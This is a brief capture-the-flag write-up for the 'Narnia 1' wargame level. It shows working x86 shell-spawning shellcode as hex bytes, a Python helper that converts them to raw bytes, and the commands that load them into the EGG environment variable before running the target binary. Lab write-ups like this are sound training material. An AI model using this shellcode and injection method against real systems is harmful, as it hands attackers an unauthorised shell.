Narnia 1
========

Create shellcode and set EGG to it.

Learning to create the shellcode was very valuable by itself, and is written up
in the notes section.

Setting EGG to it also took a bit of doing, but I wrote a helper python script
to do the right thing.

``` sh
$ export EGG=$(python hex2bytes.py $(objdumptoshellcode shell32))
$ ./narnia1
```

BUT python 2.7.13 on the target box, not 2.7.16.  This ends up meaning we use
this different script:

``` python
import sys

barr = sys.argv

for b in barr[1:]:
    sys.stdout.write(chr(int(b, 16)))
```

and hand it a space separated list of the hex numbers without any prefix, so
like this:

``` sh
$ export EGG=$(python /tmp/tmp.RFB0F4hoc4/asdf.py 31 c0 99 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 b0 0b cd 80)
$ ./narnia1
```
